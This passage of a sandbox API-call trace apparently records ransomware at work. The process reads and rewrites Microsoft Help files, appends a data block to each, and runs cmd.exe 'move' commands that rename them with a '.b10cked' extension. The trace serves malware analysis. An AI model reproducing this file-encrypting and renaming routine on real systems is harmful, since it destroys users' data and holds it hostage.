lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.786] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.788] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.788] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.788] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.788] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.788] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.788] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.SETLANG.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0199.087] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0199.087] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.087] CloseHandle (hObject=0x120) returned 1 [0199.123] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN") returned 0x27 [0199.124] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.176] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe58, dwThreadId=0xe84)) returned 1 [0199.283] CloseHandle (hObject=0x1b4) returned 1 [0199.283] CloseHandle (hObject=0x120) returned 1 [0199.283] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.283] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.283] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.283] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.283] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.284] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.284] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.284] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25607401321) returned 1 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.286] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0199.288] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.288] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0199.288] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0199.288] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0199.288] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0199.288] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0199.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0199.292] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0199.292] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.292] CloseHandle (hObject=0x120) returned 1 [0199.293] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN") returned 0x27 [0199.294] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.294] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xda8, dwThreadId=0x608)) returned 1 [0199.454] CloseHandle (hObject=0x1b4) returned 1 [0199.454] CloseHandle (hObject=0x120) returned 1 [0199.454] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.454] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.454] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.455] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25624390542) returned 1 [0199.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, 